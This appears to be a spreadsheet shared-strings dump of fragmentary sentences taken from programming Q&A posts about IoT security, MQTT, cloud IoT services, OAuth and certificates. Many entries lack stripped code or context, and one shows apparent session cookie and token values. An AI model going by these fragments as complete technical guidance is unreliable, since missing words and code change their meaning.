    <t>My goal is to reach following scenario: use CA root cert to generate some intermediate cert, then use this intermediate cert to sign device's cert.</t>
  </si>
  <si>
    <t>Done
E: Failed to fetch https://apt.dockerproject.org/repo/dists/raspbian-buster/InRelease  403  Forbidden [IP: 13.249.111.113 443]
E: The repository 'https://apt.dockerproject.org/repo raspbian-buster InRelease' is not signed.</t>
  </si>
  <si>
    <t>My challenge is that I need all these fields be exposed as an Analytics on my Azure subscription.</t>
  </si>
  <si>
    <t>This is a security feature since it disallows additional module loading during runtime and on user request.</t>
  </si>
  <si>
    <t>Basically you store a refresh token that you receive the first time the user authorizes you, and you can use that to get new tokens without prompting the user.</t>
  </si>
  <si>
    <t>The most logical answer would be  for http, or if you wish to be more secure, port 443 for https.</t>
  </si>
  <si>
    <t>I think that two of them working cooperatively, interfaced using the SPI bus might be workable... maybe even three of them, one dedicated to maintaining the list of authenticated MACs, expiring them, etc.</t>
  </si>
  <si>
    <t>If an MQTT client sends a
  message with the clean session attribute set to false, the client will
  be disconnected.</t>
  </si>
  <si>
    <t>I would hazard a guess that, sometimes, your  contains unescaped characters that are not properly encoded before they are sent in the POST body.</t>
  </si>
  <si>
    <t>You can implement this by:
having a secret as part of the url of the http request, i.e.</t>
  </si>
  <si>
    <t>Here's an example for the intel edison board: https://software.intel.com/en-us/blogs/2015/04/06/using-edison-securely-connect-iot-sensor-to-the-internet-with-mqtt</t>
  </si>
  <si>
    <t>Turns out the issue is that you need to:   
have both a policy and a certificate in the console
explicitly associate them to each other</t>
  </si>
  <si>
    <t>Since the app you're developing is loaded over https in the cordova webview inside the viewer, it's not allowed to request non-https resources.</t>
  </si>
  <si>
    <t>If you get exactly the same encrypted message it's a repeat post can be safely be dropped.</t>
  </si>
  <si>
    <t>So now I'd say your options are:
Open a github issue https://github.com/micropython/micropython/ in which you ask them to implement WPA2 authentication for the ESP8266
Switch to the C SDK from Espressif</t>
  </si>
  <si>
    <t>by searching
for particular SSIDs)
Send GET request to http://192.168.4.1/wifisave?s=NETWORK_SSID&amp;p=NETWORK_PASSWORD
However, please bear in mind that it's pointless otherwise.</t>
  </si>
  <si>
    <t>If you do not return the success message back that the http probe is trying to get, it will think it is behind a captive portal.</t>
  </si>
  <si>
    <t>If the key is incorrect then data in the card cannot be accessible and throws an error message Authentication failed () :communication error.</t>
  </si>
  <si>
    <t>Preferred protocols are messaging protocols, such as MQTT or AMQP, but HTTPS is also supported.</t>
  </si>
  <si>
    <t>The Nginx server is running in an instance in the VPC
/etc/nginx/nginx.conf
The internal private VPC has a DNS Server that resolves mqtt.googleapis.com to the IP of the Nginx server</t>
  </si>
  <si>
    <t>So as long as you can implement an MQTT connection on the gateway device, and can encrypt a JWT (Json Web Token), you can connect to IoT Core.</t>
  </si>
  <si>
    <t>For IAM role, your trust relationship should contain:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "",
      "Effect": "Allow",
      "Principal": {
        "Service": "iot.amazonaws.com"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}</t>
  </si>
  <si>
    <t>Note, that this access token can be stored in the Azure Key Vault, see more details here.</t>
  </si>
  <si>
    <t>Some IoTHub limits or expired access token cause the connection refused issue.</t>
  </si>
  <si>
    <t>Simple conclusion: you can not run the server (just http - no encryption) AND have a secure client in the same program.</t>
  </si>
  <si>
    <t>That reference was about a corrupted install &lt;https://microsoft.github.io/azure-iot-developer-kit/docs/faq/&gt;.</t>
  </si>
  <si>
    <t>You can also find the primary key if you go to your IoT hub's Shared access policies in Settings.</t>
  </si>
  <si>
    <t>Example of the item in the storageContainers array:
Note, that the Authorization Bearer token is required for GET/PUT requests.</t>
  </si>
  <si>
    <t>Error message/exception when access to a certain resource is denied due to insufficient privileges.</t>
  </si>
  <si>
    <t>streaming audio / video over a secured http connection</t>
  </si>
  <si>
    <t>The exception that is thrown when the file image of a dynamic link library (DLL) or an executable program is invalid.</t>
  </si>
  <si>
    <t>`urllib3` is a 3rd-party Python HTTP library with thread-safe connection pooling, file post, and more.</t>
  </si>
  <si>
    <t>AFOAuth2Client is an extension for AFNetworking that greatly simplifies the process of authenticating against an OAuth 2 provider.</t>
  </si>
  <si>
    <t>SSH.NET is an open-source .NET port of the Java Sharp.SSH library and is available under the BSD and MIT license.</t>
  </si>
  <si>
    <t>HelloJS is a client-side Javascript SDK for authenticating with OAuth2 (and OAuth1 with a oauth proxy) web services and querying their REST API's.</t>
  </si>
  <si>
    <t>Checked exception thrown when an attempt is made to access a file that does not exist.</t>
  </si>
  <si>
    <t>SSH.NET is a simple SSH client library providing SSH connectivity, port tunnelling etc.</t>
  </si>
  <si>
    <t>Cookieless is a property in ASP.NET SessionStateSection indicating whether cookies are used to identify client sessions.</t>
  </si>
  <si>
    <t>A FaultException is the type of exception WCF services and clients use to communicate exceptions and optionally their details.</t>
  </si>
  <si>
    <t>BungeeCord is a popular library / framework for proxying minecraft servers behind a single gateway.</t>
  </si>
  <si>
    <t>Tokens are issued to clients by an authorization server with the approval of the resource owner.</t>
  </si>
  <si>
    <t>Spam is the use of electronic messaging systems to send unsolicited bulk messages indiscriminately.</t>
  </si>
  <si>
    <t>Topics relating to Azure Role Base Access Control</t>
  </si>
  <si>
    <t>Please consider using this tag if you've a question about passwordbox control while developing thick client .NET applications.</t>
  </si>
  <si>
    <t>You can organize those accounts into groups and attach policy-based controls.</t>
  </si>
  <si>
    <t>Character encoding for the Web is defined in the Encoding Standard.</t>
  </si>
  <si>
    <t>ModSecurity supplies an array of request filtering and other security features to the Apache HTTP Server.</t>
  </si>
  <si>
    <t>Jazz products are being built in a completely transparent manner on jazz.net.</t>
  </si>
  <si>
    <t>Before the redirect, a cookie will be set on the HTTP response with a value which is uniquely associated with the data entry in the session scope.</t>
  </si>
  <si>
    <t>See the full Wikipedia article on the subject: Percent-encoding</t>
  </si>
  <si>
    <t>or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an
SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.</t>
  </si>
  <si>
    <t>Transparent Network Substrate (TNS) is, [to quote]:
A foundation technology, built into the Oracle Net foundation layer
  that works with any standard network transport protocol.</t>
  </si>
  <si>
    <t>The project home page http://www.mindrot.org/projects/jBCrypt/.</t>
  </si>
  <si>
    <t>Finally, the client is redirected back to the relying party presenting the security token.</t>
  </si>
  <si>
    <t>After installation, the location of the BadMail directory can be altered via the Messages tab of the tab of the property sheet for the SMTP site in the Microsoft Management Console.</t>
  </si>
  <si>
    <t>The protocol is based on a 32-bit header containing both network and transport layer information.</t>
  </si>
  <si>
    <t>OpenID Connect introduce a token type namely ID Token, which is a JSON Web Token (JWT).</t>
  </si>
  <si>
    <t>Authorization constraint,
Specifies whether authentication is to be used and names the roles authorized to perform the constrained requests.</t>
  </si>
  <si>
    <t>When embedded in the web, WebAssembly will enforce the same-origin and permissions security policies of the browser.</t>
  </si>
  <si>
    <t>Seamless SSL Support (HTTPS -&gt; HTTP proxy)
Automatic HTTP to HTTPS redirects.</t>
  </si>
  <si>
    <t>Dating back to 2009, it was available prior to the creation of libressl's libtls interface in 2014.
http://ports.su/security/assl
http://en.wikipedia.org/wiki/assl</t>
  </si>
  <si>
    <t>PAYFORT is an Online Payment Gateway:
accept online payments.</t>
  </si>
  <si>
    <t>If you allow the user to specify part of the body of the message, you must also validate or sanitize it so that he's unable to, e.g.</t>
  </si>
  <si>
    <t>Most JavaScript-related security bugs are breaches of either the same origin policy or the sandbox.</t>
  </si>
  <si>
    <t>If it is absent, then it will redirect to the login page on http://localhost:8080/contextname/login, otherwise it will just continue the request.</t>
  </si>
  <si>
    <t>A proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers.</t>
  </si>
  <si>
    <t>Dump and analyze network traffic, even when encrypted with SSL/TLS.</t>
  </si>
  <si>
    <t>With this token, the application/user requests something to the protected service, reaching the PEP Proxy.</t>
  </si>
  <si>
    <t>In other words what Firebug is to debugging your client side code, Glimpse is to debugging your server within the client.</t>
  </si>
  <si>
    <t>Even the web server handlers obey this rule, as an HTTP response is a valid uwsgi packet (look at the modifier1 = 72).</t>
  </si>
  <si>
    <t>SSH uses public-key cryptography to authenticate the remote computer and allow it to authenticate the user, if necessary.</t>
  </si>
  <si>
    <t>There are two notable exceptions to the browser same-origin security policy:   and &lt;img&gt; html tags may load data from any url.</t>
  </si>
  <si>
    <t>It allows for in-context editing of content for logged in admin-level users.</t>
  </si>
  <si>
    <t>Unactivated accounts and forgotten password requests auto-expire.</t>
  </si>
  <si>
    <t>NOTE : 
I have used the generated verification code from the Azure Portal for the registered certificate.</t>
  </si>
  <si>
    <t>I'm looking for some guidance with regards to the bulk provisioning of Greengrass 
Groups, Cores, Certificates.</t>
  </si>
  <si>
    <t>I have generated valid certificates that are :-
aws-root-ca.pem
certificate.pem.crt
private.pem.key</t>
  </si>
  <si>
    <t>You could also put a proxy (nginx or squid) in the chain to allow for stricter throttling.</t>
  </si>
  <si>
    <t>The encoding header and the encoding method don't match.</t>
  </si>
  <si>
    <t>ASP.NET Core Identity is a membership system which allows you to add login functionality to your application.</t>
  </si>
  <si>
    <t>SAS Created with Device explorer twin
&gt;
Azure IoT Hub Certificate
in here says use Baltimore certificate as CA
Client crt
Client key
But is not working for me right now</t>
  </si>
  <si>
    <t>I think, as the server is an Arduino, that it may be something to do with the request headers that Safari iOS is sending, that maybe the Arduino server doesn't like and returns a 404 error.</t>
  </si>
  <si>
    <t>If the device ID is present in the telemetry, filtering is easy.</t>
  </si>
  <si>
    <t>That means the devices themselves cannot create connections and provide IoT Hub credentials.</t>
  </si>
  <si>
    <t>Your Node-RED application should be authenticating with a valid API Key.</t>
  </si>
  <si>
    <t>Once the user has been authenticated the first time, the server creates two cookies:  and LtpaToken2.</t>
  </si>
  <si>
    <t>No exceptions if I use a PFX windows generated certificate just can't access from Alexa!</t>
  </si>
  <si>
    <t>I've created the certs on the server as described here.</t>
  </si>
  <si>
    <t>If your connected device has not published it's location you will not be able to receive anything.</t>
  </si>
  <si>
    <t>Event Hub relies on keys for access.</t>
  </si>
  <si>
    <t>Make sure that the AWS IoT policy associated with your IoT certificate allows publishing on the  topic.</t>
  </si>
  <si>
    <t>You need use IoT Hub SAS token to create device like this:
You can get IoT Hub SAS token from device explorer.</t>
  </si>
  <si>
    <t>OAuth 2.0 is the next evolution of the OAuth protocol which was originally created in late 2006.</t>
  </si>
  <si>
    <t>I have created an app with Cognito Authenticated User Pool.</t>
  </si>
  <si>
    <t>If yes, how can we generate access token from it ?</t>
  </si>
  <si>
    <t>When connecting with the client, I need to provide the sessionToken created by the assumeRole.</t>
  </si>
  <si>
    <t>Here is an example of generating SAS token via node.js.</t>
  </si>
  <si>
    <t>In .Net 4.5 MVC5 I can REST-access (REST, no storage library) an azure table without difficulty using this:
On Windows IoT-Core (UWP) newest from Oct. 2015 I use the following (since the above is not supported), which gives me a 403 error and complains that my signature is wrong.</t>
  </si>
  <si>
    <t>According to this comment to an issue on github there are only two supported cipher suites:
TLS_RSA_WITH_AES_128_CBC_SHA and 
TLS_RSA_WITH_AES_256_CBC_SHA
The host supports the following cipher suites:
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
Is there any chance to perform a HTTPS request to this host on an ESP8266 anyway?</t>
  </si>
  <si>
    <t>For convenience, users can try a live demo version of eXide via the exist-db.org website at https://exist-db.org/exist/apps/eXide, although the functions there are limited to guest-level permissions.</t>
  </si>
  <si>
    <t>The .NET Framework XMLDSIG classes implement the World Wide Web Consortium (W3C) specification for XML signing and verification located at http://www.w3.org/TR/xmldsig-core/</t>
  </si>
  <si>
    <t>You can easily use these to monitor these events - however, you should be aware that the MQTT protocol is designed to be robust to a poor networking conditions and the broker on the AWS side probably doesn't think it's a bit deal to disconnect a client.</t>
  </si>
  <si>
    <t>I kept the change I made to the New-CACertsCertChain (mentioned above)
I erased all the previous certs from the machine cert store
Then I closed the existing PowerShell console and started a new admin one.</t>
  </si>
  <si>
    <t>Including:
Creating git repos
Managing access by individuals and groups
Linking JIRA issues to commits
Creating and managing pull requests</t>
  </si>
  <si>
    <t>I plan to assume a role on the back end with STS and return the credentials directly to the client which they can then use to connect to IOT.</t>
  </si>
  <si>
    <t>This typically means that the clock of the device you are running wget on is not correct, or the cert isn't valid yet (or has expired, but the tense doesn't give that meaning -- i.e.</t>
  </si>
  <si>
    <t>Telemetry events sent to Cloud IoT are sent to a Cloud Pub/Sub topic that is configured when the device registry is created and are not intended to be retrieved via MQTT on devices.</t>
  </si>
  <si>
    <t xml:space="preserve">
PDF417 is a stacked linear barcode symbol format used in a variety of
  applications, primarily transport, identification cards, and inventory
  management.</t>
  </si>
  <si>
    <t>I am working on an app that players of League of Legends can create profiles of themselves; but I need to authenticate them to prevent creating fake accounts of other players.</t>
  </si>
  <si>
    <t>We recommend using an intermediate cert to sign the device because the security best-practice is for roots to be kept offline.</t>
  </si>
  <si>
    <t>It separates the storage of cookies from the policy which decides to accept or deny cookies.</t>
  </si>
  <si>
    <t>It
  also establishes several security-relevant requirements for TSA
  operation, with regards to processing requests to generate responses.</t>
  </si>
  <si>
    <t>They are means to work around this such as using mechanisms that grant permission, data formats that aren't subject to the policy and intermediary servers, and  most significantly, the CORS protocol.</t>
  </si>
  <si>
    <t>It is really weird...
A second thing I would like to be able to, is add a "Access-Control-Allow-Origin: *" line in the http response.</t>
  </si>
  <si>
    <t>If am specifying wrong controllers then avrdude throws error message syaing wrong device signature.</t>
  </si>
  <si>
    <t>The activation request failed with error
  "This program is blocked by group policy.</t>
  </si>
  <si>
    <t>When I follow the gst-python identity.py example at https://github.com/GStreamer/gst-python/blob/master/examples/plugins/python/identity.py , the prescribed instructions do not work.</t>
  </si>
  <si>
    <t>trying to upload a *.cer for an enrollment group...it keeps saying:
Request body validation failed.</t>
  </si>
  <si>
    <t>I want to reporting something to google spreadsheet, my code for example:
I get error:
gc = gspread.authorize(credentials) AttributeError: 'module' object
  has no attribute 'authorize'
Thanks for feedback
regards
malin</t>
  </si>
  <si>
    <t>I'm getting the following error :
java.sql.SQLException: Client does not support authentication protocol
  requested by server; consider upgrading MariaDB client</t>
  </si>
  <si>
    <t>I had seen somewhere that the default login for root wasnt any password, but was authenticated via a socket connection, but I have not been able to find out more about that
Thanks for any help</t>
  </si>
  <si>
    <t>Error is [Error
  Domain=com.amazonaws.AWSCognitoIdentityErrorDomain Code=5 "(null)"
  UserInfo={__type=InvalidIdentityPoolConfigurationException,
  message=Invalid identity pool configuration.</t>
  </si>
  <si>
    <t>2018-06-04 17:13:00:017 IoTSampleSwift[4999:2464150]
  error: Error Domain=com.amazonaws.AWSCognitoIdentityErrorDomain Code=5
  "(null)" UserInfo={__type=InvalidIdentityPoolConfigurationException,
  message=Invalid identity pool configuration.</t>
  </si>
  <si>
    <t>My thought is that I would feed openssl the path to the root cert and then it would dump out the publicCert/privateKey I want.</t>
  </si>
  <si>
    <t>The code is basically the Cognito example, but directly passing the secret access key and access key id instead of pulling from the cognito id pool.</t>
  </si>
  <si>
    <t>If any of the above occurs and i send data with SendData() an exception will be thrown and handled except for case 1. in which it simply goes undetected.</t>
  </si>
  <si>
    <t>And the "roots.pem" certificate used to communicate between device and cloud iot core using mqtt bridge, which i got from this link 'https://pki.google.com/roots.pem'.</t>
  </si>
  <si>
    <t>The local little server which communicates to the IoT-Hub on Azure looks like this:
How Can I make sure that this communication is secure?</t>
  </si>
  <si>
    <t>that I'm mapping to the devices registered in IoT Hub based on device-twin properties.</t>
  </si>
  <si>
    <t>rather than
Ethernet.begin(mac, ip);
NOTE 
You should be careful posting your twitter token id on a forum.</t>
  </si>
  <si>
    <t>Session ids are usually tokens put into cookies in  requests, and are a pain to manage and track, and you don't need them for your use case.</t>
  </si>
  <si>
    <t>If you want to do it more secure way you need to find which permissions cec-client required to run properly and then add them to user www-data.</t>
  </si>
  <si>
    <t>SSL/TLS has significant overheads:
At start up, the client and server exchange certificates, etcetera to so that (at least) the client can verify that the server is not an imposter.</t>
  </si>
  <si>
    <t>(Think of the "new" operator as requesting permission (key) for accessing a memory location, and so if you lose the address of that location, you can't use it any more, and nobody else can either (because you have the key!)</t>
  </si>
  <si>
    <t>You can also interface with device shadows using the HTTPS version of the endpoint by signing requests with AWS Signature version 4.</t>
  </si>
  <si>
    <t>Based on your latest comment the solution is simple: you need an up-to-date firmware.</t>
  </si>
  <si>
    <t>That all said, I do believe it's in Microsoft's best interest is to improve the reliability for IoT devices running Windows IoT.</t>
  </si>
  <si>
    <t>I solved it with the folowing changes,
config.mk :
mosquitto.conf:
Change :
user mosquitto by user pi
Add at the end of the file:
listener 1883
listener 9001 &lt;Raspberry IP&gt;
protocol websockets
Re-run the broker
Then i could connect my subscriber to the broker on port 9001.</t>
  </si>
  <si>
    <t>Basically the keyName refers to the name of the access policy, eg "TelemetrySender" and the key refers to the primary or secondary key of the access policy.</t>
  </si>
  <si>
    <t>I think you can get the Cognito Identity ID from the  property (in case of noe.js runtime)  of the context parameter (context.identity) as explained here.</t>
  </si>
  <si>
    <t>It wasn't picking up the fact that I had attached my Cognito Identity to the Thing as I would have expected it to do.</t>
  </si>
  <si>
    <t>In the meantime, please post the logs from the Edge Agent and we can take a look to determine if you're running into 5671 being blocked or a different issue.</t>
  </si>
  <si>
    <t>The first set of topics are applied to anonymous clients, assuming
  allow_anonymous is true.</t>
  </si>
  <si>
    <t>If it is a downstream device, then along with using the right connection string, you also need to make sure the device trusts the certificate used to accept the connection by the gateway device.</t>
  </si>
  <si>
    <t>Use verbose mode on the client side (ssh -v / ssh -vv / ssh -vvv); you seem to have exercised that option already
Inspect logs on server side (Raspberry Pi), cat /var/log/auth
Inspect network connection between client (PC that runs PuTTy) and server (Raspberry Pi).</t>
  </si>
  <si>
    <t>Here is the sample to create your certs by using OS bash script:
And this instructions can be invoked in NodeJs by using something like this:
Once you have this certs you can use them just 1 pair per device.</t>
  </si>
  <si>
    <t>I just tested again and added the "primary key" connection string from:
Shared Access Policies -&gt; iothubowner and it worked.</t>
  </si>
  <si>
    <t>Also, be sure the shadow is being updated and messages are being published in your IoT Core monitoring tool.</t>
  </si>
  <si>
    <t>Azure IoT Hub only supported security communication, for MQTT protocol it use 8883 port number.</t>
  </si>
  <si>
    <t>And the client must be configured to know to connect to the proxy server, which must be able to inspect the original request in order to know where to connect to for it.</t>
  </si>
  <si>
    <t>If you have a G Suite domainif you use G Suite, for examplean
  administrator of the G Suite domain can authorize an application to
  access user data on behalf of users in the G Suite domain.</t>
  </si>
  <si>
    <t>This policy takes action when devices associated with the enrollment entry submit a new request (1).</t>
  </si>
  <si>
    <t>You may find this useful
Evaluating Your IOT Security
The right secure hardware for your IoT deployment</t>
  </si>
  <si>
    <t>Microsoft.Azure.Devices.Provisioning.Security.Tpm is relying on Microsoft.TSS 2.0.1 NuGet Package which has only binaries for linux-x64.</t>
  </si>
  <si>
    <t>Which one is only on your choice.. TCP, HTTP, HTTPS.. As you would be able to manipulate GPIOs you'd want some form of authentication.</t>
  </si>
  <si>
    <t>If you are using X.509 based authentication, your Azure Function is getting the actual certificate as part of the request (in the  field).</t>
  </si>
  <si>
    <t>Now, depending on the business case, and if your downstream device does not have a connection and visibility to IoT Hub at all, another way is that you do not register the downstream device as a device at all.</t>
  </si>
  <si>
    <t>If you genuinely don't require a username and password then don't use the  function that expects them:
I see you are using a fairly generic client id - ESP8266Client.</t>
  </si>
  <si>
    <t>For test purpose, the token can be obtained for example from this when you click on the Try it, see the Request Preview.</t>
  </si>
  <si>
    <t>PuTTY Secure Copy client (pscp)  is a command-line SCP client for transferring files securely between computers using an SSH connection.</t>
  </si>
  <si>
    <t>SSLSocketFactory can be used to validate the identity of the HTTPS server against a list of trusted certificates and to authenticate to the HTTPS server using a private key.</t>
  </si>
  <si>
    <t>Use ASP.NET Core Identity to add login functionality to an ASP.NET Core application.</t>
  </si>
  <si>
    <t>OAuth (Open Authorization) is a specification for client applications to access protected resources on behalf of a user.</t>
  </si>
  <si>
    <t>Asynchronous sockets allow for multiple simultaneous non-blocking socket connections.</t>
  </si>
  <si>
    <t>Operations such as requests, cookies, and sending data over HTTP are handled by various C++ classes.</t>
  </si>
  <si>
    <t>Implements HTTP content negotiation algorithm that can be used both in protocol modules and in server scripts (like CGI scripts).</t>
  </si>
  <si>
    <t>If the fake object was used incorrectly then you'll see an informative exception message with a traceback that points to the culprit.</t>
  </si>
  <si>
    <t>Statements by Intel can be found at 
https://software.intel.com/en-us/xdk and https://software.intel.com/en-us/forums/intel-xdk/topic/722218.</t>
  </si>
  <si>
    <t>This will almost always be used once a user is logged in, and an access token has been granted; the permissions encoded by the access token determine which Graph API calls will be available.</t>
  </si>
  <si>
    <t>Attempting to access this property for other source types results in the throwing of an NSInvalidArgumentException exception.</t>
  </si>
  <si>
    <t>https://.yourdomain.com
        http://.yourdomain.com
        PUT
        POST
        DELETE
        ETag
        *
Setup a signing handler on your application server (see signer_example.py).</t>
  </si>
  <si>
    <t>In ASP.NET  property gets or sets a value indicating whether cookies are used to identify client sessions.</t>
  </si>
  <si>
    <t>{ssl: {
    redirectPort: port, // optional https port number to be redirected if entering using http.</t>
  </si>
  <si>
    <t>For the .NET 4.x, katana based version see Identity Server 3
GitHub Repository
Documentation
Samples</t>
  </si>
  <si>
    <t>A common source of errors is the misunderstanding of manifest version 2 and Content Security policy (CSP).</t>
  </si>
  <si>
    <t>It's primary role is as an OAuth2 provider, issuing tokens for client applications to use when they act on behalf of Cloud Foundry users.</t>
  </si>
  <si>
    <t>Caddy became famous, among other things, for being the first web server to support automatic provisioning of SSL certificates via Let's Encrypt.</t>
  </si>
  <si>
    <t>HTTP is stateless: As mentioned above, HTTP is connectionless and it is a direct result of HTTP being a stateless protocol.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a key in an application's Info.plist file that leads to a dictionary value that contains instructions on how to modify an application's HTTP connection security policy.</t>
  </si>
  <si>
    <t>NSV streaming
RTP/RTSP streaming
SIP
MPEG/TS streaming (Live and VOD)
Security
Red5 installs and runs using Tomcat.</t>
  </si>
  <si>
    <t>DCOM is designed for use across multiple network transports, including Internet protocols such as HTTP.</t>
  </si>
  <si>
    <t>The authenticated user's private profile information  One of the profile scopes has been granted.</t>
  </si>
  <si>
    <t>Services designed using REpresentational State Transfer architecture must often authenticate clients.</t>
  </si>
  <si>
    <t>HTTP Servers also handle other attributes of such a request, such as Query Strings and Cookies.</t>
  </si>
  <si>
    <t>The command looks like:
The cognito identity id can be found using the  or you could also find it in the responses to your CognitoIdentityCredentials.get call.</t>
  </si>
  <si>
    <t>It works by wrapping executable logic with one or more resilience policies, which can be combined and composed as needed.</t>
  </si>
  <si>
    <t>Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.</t>
  </si>
  <si>
    <t>This new SDK in addition to CLP, includes binaries for authentication with ADAL services, and telemetry.</t>
  </si>
  <si>
    <t>Existing Objective-C classes can be used in .NET code in an almost transparent manner.</t>
  </si>
  <si>
    <t>For questions about recovering data from old floppy disks, consider posting on Super User, Retrocomputing.SE, or Information Security.SE.</t>
  </si>
  <si>
    <t>Here's the apparent fix:
First you will need to have support for https, it isn't installed by default when creating a chroot with crouton.</t>
  </si>
  <si>
    <t>Maybe you could try to add information to http-header, like user-agent?</t>
  </si>
  <si>
    <t>registering a callback for the STA_GOT_IP event with the WiFi event monitor.</t>
  </si>
  <si>
    <t>In that case, messages published while the subscriber is not
connected will be redistributed whenever it reconnects.</t>
  </si>
  <si>
    <t>Authentication
Because sessions are no longer included with Lumen, authentication must be done statelessly using API tokens or headers.</t>
  </si>
  <si>
    <t>Squid is one of the best known open source HTTP proxy servers.</t>
  </si>
  <si>
    <t>It is both a library for building new blockchains and a skeleton key of a blockchain client, able to synchronize to any Substrate-based chain.</t>
  </si>
  <si>
    <t>When in my dts file I create a new gpio-key node, no matter what is in the node, the buttons no longer show up in /sys/kernel/degub/gpio but are lsited in /proc/device-tree/gpio-keys.</t>
  </si>
  <si>
    <t>The other three can either be there or not, or are a biproduct of a mechanism we throw in to create Availability and integrity.</t>
  </si>
  <si>
    <t>When used by ASP.NET applications returned credentials are those of the logged in user or the user being impersonated.</t>
  </si>
  <si>
    <t>I generated an ssh-key and added it in my gitlab account.</t>
  </si>
  <si>
    <t>Normally(on windows etc), I can publish/subscribe like bellow while giving the certificate files.</t>
  </si>
  <si>
    <t>The IOT shadow was updated only when I provided the authorization header and id token which meant everything went smoothly.</t>
  </si>
  <si>
    <t>On Lambda I print event:
{ 
    client_id: 'N/A',
    certificateId: '222222',
    caCertificateId: '111111111111111',
    timestamp: 3333,
    certificateStatus: 'PENDING_ACTIVATION',
    awsAccountId: '44444',
    certificateRegistrationTimestamp: '55555'
}
here "1111.." is my CA certificate.</t>
  </si>
  <si>
    <t>The key pairs are therefore generated on the chip, on the IoT device.</t>
  </si>
  <si>
    <t>To generate and sign your certificates you could use tools such as openSSL.</t>
  </si>
  <si>
    <t>You should first create a registry and device, next you can connect using the Python sample and the device credentials.</t>
  </si>
  <si>
    <t>SPL allows users to create streams of data, which are connected and manipulated by operators.</t>
  </si>
  <si>
    <t>I thought I could create a broker on the device itself.</t>
  </si>
  <si>
    <t>But my client has to create it on his Amazon AWS IoT Console and gives me the certificate/key so I can generate this p12 file on my MAC?</t>
  </si>
  <si>
    <t>However, what predicate should we use to filter on device ID when it is not present in the telemetry.</t>
  </si>
  <si>
    <t>"LPS" is my laptop's machine name which I used when generating the keys / certs as per this document: https://mosquitto.org/man/mosquitto-tls-7.html
Here's my call to the connect method:
On the RPi3B+ I have the same Certificate Authority cert (ca.crt).</t>
  </si>
  <si>
    <t>If I want to allow a user's iot device to be provisioned only after they have created an account, is this possible?</t>
  </si>
  <si>
    <t>I also used create_test-cert.js device {leafcertificate} {rootcertificate-name} to create the device certificate.</t>
  </si>
  <si>
    <t>It doesn't matter who generates the key's per say, just how they're transported.</t>
  </si>
  <si>
    <t>Simple variables, arrays and objects returned to the developer
RETS communication (over HTTP)
HTTP Header management
Authentication
Session/Cookie management
Installation
The easiest way to get started is using Composer to install troydavisson/phrets:
There is more information available about PHRETS at the project's Github site, including additional installation instructions and examples for common use.</t>
  </si>
  <si>
    <t>I've enabled Verbose on Connections in the monitoring categories for my Iot hub:
My devices connect to my Hub and show in Device Explorer:
I then have an Azure Function set to log my data from the Operations Monitoring to an Azure SQL db:
If I enable Device Identity Operations in Operations Monitoring, I get create events being logged.</t>
  </si>
  <si>
    <t>However, CUBRID has two different license policies for interface and server to address the limitations of the traditional open source DBMS and provide excellent cost savings to companies
The name "CUBRID" is a combination of two words "Cube" and "Bridge".In case of CUBRID, "Bridge" stands of the "data bridge", while "Cube" is a sealed box which provides security for its contents.</t>
  </si>
  <si>
    <t>Hi all I am trying to create a door lock using the following
then the following: 
When I run the program I get the message app server running at port 3000, however when I call it I get the following message: 
TypeError: GPIOCtrl.unlock is not a function
What am I doing wrong?</t>
  </si>
  <si>
    <t>I can see that some cookies are being sent, including two JSESSIONIDs (which seems odd):
JSESSIONID=4D274F4F3A5AABE1F7D61E27C384B973; JSESSIONID=9EB3FADCEE9CA1C5156D25133FDC2C7E; requestedURI="../../policy/effective-policy?type=android&amp;id="; commonAuthId=7a7c8a6c-7932-42ef-b670-4ccf50b14bfa; samlssoTokenId=b3b01735-5aac-4e60-9863-af4fce62abb0
Interestingly, none of the cookies are marked as "secure", which seems bad.</t>
  </si>
  <si>
    <t>My app lives at 
and node lives at /home/pi/node-v0.10.28-linux-arm-pi/bine/node
I've setup raspbian to login to the pi user automatically at boot, now I need to automatically run app.js in the foreground (since it requires input from a USB device).</t>
  </si>
  <si>
    <t>Simply, get your device's , device Id, and Primary or Secondary key (from the top right Device explorer page - there is button named as Connect)
Then you could create the connection string using https://github.com/Azure/dps-keygen</t>
  </si>
  <si>
    <t>For this purpose I would like to write a minimalistic key event listener but I can't manage to make python listen the key release event with my code:
If I hold the key w down, it will be recognized.</t>
  </si>
  <si>
    <t>Separately, if you have openSSL, you can check your certificate to see what information is included in the cert, and check if any of it might be impacted by a dynamic IP address.</t>
  </si>
  <si>
    <t>In order to send messages to the Azure IoT Hub, you first need to register the devices to the IoT Hub registry, though how can you make the devices register its' ID by themselves in a safe way?</t>
  </si>
  <si>
    <t>/etc/apache2/sites-available/default-ssl
default:
detault-ssl:
best regards thanks for your advices</t>
  </si>
  <si>
    <t>Since we need to keep to the client really light, we thought we use encryption rather than TCP stack or HTTPS, to make our data transfer a little more secure.</t>
  </si>
  <si>
    <t>I've extracted the fingerprint using my browser and put it into my program (I am quite familiar with using SSL certs).</t>
  </si>
  <si>
    <t>When stepping through with default values I keep getting this message:  But there are no validation errors on any of the setup pages, or the page with the error message.</t>
  </si>
  <si>
    <t>I have setup a group enrollment in the the Azure Device provisioning service with a root certificate that has been validated.</t>
  </si>
  <si>
    <t>Here's the node.js file that I want to execute from my web app, and I'd like to send the auth token from the web app too.</t>
  </si>
  <si>
    <t>Following are the changes done:
tb-gateway.yml
mqtt-config.json
{
  "host": "127.0.0.1",
  "port": 1883,
  "ssl": false,
  "retryInterval": 3000,
}
thingsboard.yml
 mqtt:
 # Enable/disable mqtt transport protocol.</t>
  </si>
  <si>
    <t>The 2 examples show information being sent from 2 different IoT assets, the only keys that are guaranteed to be common to both are the TimeStamp, AssetId, RPM, Pwr and Runhrs.</t>
  </si>
  <si>
    <t>The API for Unix domain sockets is similar to that of an Internet socket, but it does not use an underlying network protocol for communication.</t>
  </si>
  <si>
    <t>http://192.168.0.5/mypage?secret=1234, this happens:
Processing the HTTP request
The implementation of the web server is quite simple.</t>
  </si>
  <si>
    <t>According to the error message, this email may be rejected because of the spam policy on google mail server.</t>
  </si>
  <si>
